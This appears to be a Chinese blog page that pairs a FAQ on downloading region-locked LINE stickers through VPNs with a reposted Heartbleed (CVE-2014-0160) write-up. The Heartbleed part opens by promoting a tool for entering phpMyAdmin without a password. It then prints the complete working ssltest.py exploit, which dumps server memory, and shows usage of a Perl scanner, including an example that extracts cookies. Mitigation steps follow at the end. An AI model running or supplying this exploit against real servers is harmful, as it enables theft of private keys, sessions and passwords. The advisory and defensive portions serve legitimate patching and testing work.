A: 如果是自己付費去買的vpn, 就會是固定的, 免費的有些是 vpnc 有些是 vpnu, 有些是要用email 去申請帳號, 有些是安裝app 就可以連不需要帳號.

Q: 用這個不分區下載貼圖臉書是不是比較容易被盜?
A: 理論上是不會被盜。

Q: 日本貼圖要特殊條件是什麼條件嗎?
A: 特殊條件幾乎都是要花錢購買(漫畫或買飲料), 一般的情況下無法免費取得.

Q: 請問安卓一定要4以上嗎= =? 因為我是連線成功 但是到貼圖小鋪那就一片空白 圈圈一直轉 之後熊熊出現說連線錯誤 =_=
A: Android 2.x 的 VPN 連線可能不太穩, 建議使用 Android 4.x 或 iOS 的行動裝置來連 VPN.

Q: 如果line沒綁定,結果之前購買的貼圖不見,有什麼方法可以找回?
A: LINE 一定需要綁定才能使用, 你不是綁手機門號, 就是要綁FB 帳號, 也可能2個都綁, 你可能是綁了FB 之後, 又透過手機門號重新登入 LINE 就會看到貼圖都消失, 這是正常的, 只要 清除 LINE App 資料(或重新安裝), 再透過 FB (或透過輸入 Email+密碼) 登入即可.

Q: 請問攜碼到其他家電信手機號碼不變貼圖會消失嗎?
A: 只要不刪除帳號, 金幣和貼圖不會消失.

Q: Android 4.0(以上的設備) 在新增VPN站台時, 會要求設定"螢幕鎖"(密碼鎖), 要怎麼拿掉"螢幕鎖"?
A: 先到 VPN 裡, 把所有新增的VPN站台都刪除, 再回來"設定" - "安全性" - "螢幕安全性" 的地方, 就可以設為 "無" (無鎖定).

Q: OpenVPN Connect 無法點選 "我信任此應用程式".

A: 藍色光濾波器關起來就可以點,我也是醬,關了就可以點.

=====================
  • 附註 1: 你的LINE 一定要綁定 Email, 不然之前下載的貼圖會消失. 請點選 "設定電子郵件帳號" 進行設定.
  • 附註 2: LINE App 進行 "重新安裝" 或 "清除資料", 會讓已經下載到手機裡的貼圖暫時被清空, 請點選 "貼圖管理員" 進行重新下載.
  • 附註 3: 已經下載的貼圖, 如果你升級為新的 LINE 版本或是你改用其他平台時(Android 改用 iPhone), LINE貼圖一樣可以繼續使用.
  • 附註 4: 現在Android/iOS 平台每跨一次國家(例如: 從泰國切換到日本) 之前的貼圖和交談記錄不會被清除, 只需要強制停止 LINE App 即可.
====================
請先綁定一組 Email:

請先綁定 Facebook 帳號


點選 "貼圖管理員" - "我的貼圖", 重新下載之前取得的貼圖.

=====================
相關網頁:

OpenSSL CVE-2014-0160 (Heartbleed) 漏洞利用

好簡單的工具, 透過 OpenSSL 的 Heartbleed 漏洞, 免密碼直接進入 phpMyAdmin, 來檢視/修改 database 內容!



youtube 視訊教學:
https://www.youtube.com/watch?v=kFGzu0-cIxE


(python) ssltest.py 下載:
https://gist.githubusercontent.com/sh1n0b1/10100394/raw/4f24ff250124a03ad2d3d6010b6402c3a483d2f3/ssltest.py

(perl) check-ssl-heartbleed.pl 下載

資料來源:
========================

OpenSSL CVE-2014-0160 Heartbleed 嚴重漏洞

OpenSSL CVE-2014-0160 嚴重漏洞

OpenSSL 今天公告了一個極度嚴重的漏洞(CVE-2014-0160),被稱為「Heartbleed」,而他確實也如同心臟噴出血般嚴重。這個漏洞能讓攻擊者從伺服器記憶體中讀取 64 KB 的資料,利用傳送 heartbeat 的封包給伺服器,在封包中控制變數導致 memcpy 函數複製錯誤的記憶體資料,因而擷取記憶體中可能存在的機敏資料。記憶體中最嚴重可能包含 ssl private key、session cookie、使用者密碼等,因此可能因為這樣的漏洞導致伺服器遭到入侵或取得使用者帳號。
  • 軟體名稱:OpenSSL
  • 影響範圍:1.0.1 至 1.0.1f / 1.0.2-beta ~ 1.0.2-beta1
  • 修復版本:1.0.1g / 1.0.2-beta2
  • 影響系統版本
    • Debian Wheezy (stable), OpenSSL 1.0.1e-2+deb7u4
    • Ubuntu 12.04.4 LTS, OpenSSL 1.0.1-4ubuntu5.11
    • CentOS 6.5, OpenSSL 1.0.1e-15
    • Fedora 18, OpenSSL 1.0.1e-4
    • OpenBSD 5.3 (OpenSSL 1.0.1c 10 May 2012) and 5.4 (OpenSSL 1.0.1c 10 May 2012)
    • FreeBSD 10.0 - OpenSSL 1.0.1e 11 Feb 2013
    • NetBSD 5.0.2 (OpenSSL 1.0.1e)
    • OpenSUSE 12.2 (OpenSSL 1.0.1c)
  • 影響服務:HTTP、SMTPS、IMAPS、POP3S 等使用 OpenSSL 之服務
A missing bounds check in the handling of the TLS heartbeat extension can be
used to reveal up to 64k of memory to a connected client or server.

Only 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including
1.0.1f and 1.0.2-beta1.

如何自我檢測?

要如何測試自己的網站有沒有這樣的漏洞呢?可以利用以下的網站或工具直接查詢。
直接輸入 Domain 即可查詢,例如「fbi.gov」。
OpenSSL CVE-2014-0160 Heartbleed 檢測: fbi.gov
使用方法直接執行「python ssltest.py ifttt.com」,或是用「-p」指定特定 SSL 連接埠。畫面上會顯示出記憶體資料,可能內含機敏資料例如 private key、session cookie 等。
OpenSSL CVE-2014-0160 Heartbleed 檢測: ifttt.com
原始碼如下:
#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')

hb = h2bin(''' 
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time() 
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
        

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False

def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()
使用方法直接執行「perl check-ssl-heartbleed.pl mail.XXXXXX.gov.tw:443」,可在網域名稱後指定特定 SSL 連接埠。
使用說明:
Check if server is vulnerable against heartbleet SSL attack (CVE-2014-0160)
Usage: check-ssl-heartbleed.pl [ --starttls proto[:arg] ] [ --timeout T ] host:port
  --starttls proto[:arg] - start plain and upgrade to SSL with
      starttls protocol (imap,smtp,http,pop)
  -T|--timeout T         - use timeout (default 5)
  -H|--heartbeats N      - number of heartbeats (default 1)
  -s|--show-data [L]     - show heartbeat response if vulnerable, optional
                           parameter L specifies number of bytes per line (16)
  -R|--show-regex-data R - show data matching perl regex R. Option can be
                           used multiple times
  -q|--quiet             - don't show anything, exit 1 if vulnerable
  -h|--help              - this screen

Examples:
  # check direct www, imaps .. server
  check-ssl-heartbleed.pl www.google.com:443
  check-ssl-heartbleed.pl www.google.com:https
  check-ssl-heartbleed.pl mail.google.com:imaps

  # try to get Cookies
  check-ssl-heartbleed.pl -R 'Cookie:.*' www.broken-site.com:443

  # check webserver via proxy
  check-ssl-heartbleed.pl --starttls http:www.google.com:443 proxy:8000

  # check imap server, start with plain and upgrade
  check-ssl-heartbleed.pl --starttls imap imap.gmx.net:143

  # check pop server, start with plain and upgrade
  check-ssl-heartbleed.pl --starttls pop pop.gmx.net:110

  # check smtp server, start with plain and upgrade
  check-ssl-heartbleed.pl --starttls smtp smtp.gmail.com:587
  

應對措施

如果發現自己的伺服器有這樣的漏洞,該怎麼辦呢?
  1. 確認自己的 OpenSSL 版本是否在受害範圍
  2. 使用 ssltest.py 檢測工具檢測是否含有漏洞
  3. 更新 OpenSSL 至 1.0.1g 或 1.0.2-beta2
  4. 重開所有與 OpenSSL 函式庫相關之服務
  5. 重新產生 SSL Private Key (因為 Private Key 可能藉由漏洞外洩)
  6. 將網站舊憑證撤銷
  7. 清除所有目前網頁伺服器上的 Session (因為可能遭到竊取)
  8. 必要時更換網站內使用者密碼,或是密切追蹤網站是否有帳號盜用的情況發生
詳細討論與建議可以參考 Heartbleed: What is it and what are options to mitigate it?http://serverfault.com/questions/587329/heartbleed-what-is-it-and-what-are-options-to-mitigate-it

誰會是目標呢?

真的會有攻擊者利用這樣的攻擊手法嗎?目前在烏雲 wooyun平台上已經滿滿的資安研究員開始回報網站含有 OpenSSL 漏洞。也有駭客在嘗試撰寫更有效的攻擊利用程式,想要藉此把平常打不下來的網站一舉攻陷。
怎樣的站台會是重點目標呢?含有會員機制的網站特別如此,例如 Web Mail、社群網站等等。因此不少企業要多注意了,例如全世界最大的社群網站 Facebook、SlideShare、台灣知名電信公司網站、社交平台、網路銀行、NAS,都會在這波的攻擊範圍之內。如果沒有儘速修復,等到更有效的攻擊程式出現,就真的等著失血了。

小結

就連 OpenSSL 這種歷史悠久而且重要的函式庫,都可能犯這種基本的 C 語言程式設計錯誤,老舊的程式碼一定有不少陳年遺毒,如果沒有徹底清查,類似的心臟噴血事件會不斷上演。大家快點止血吧!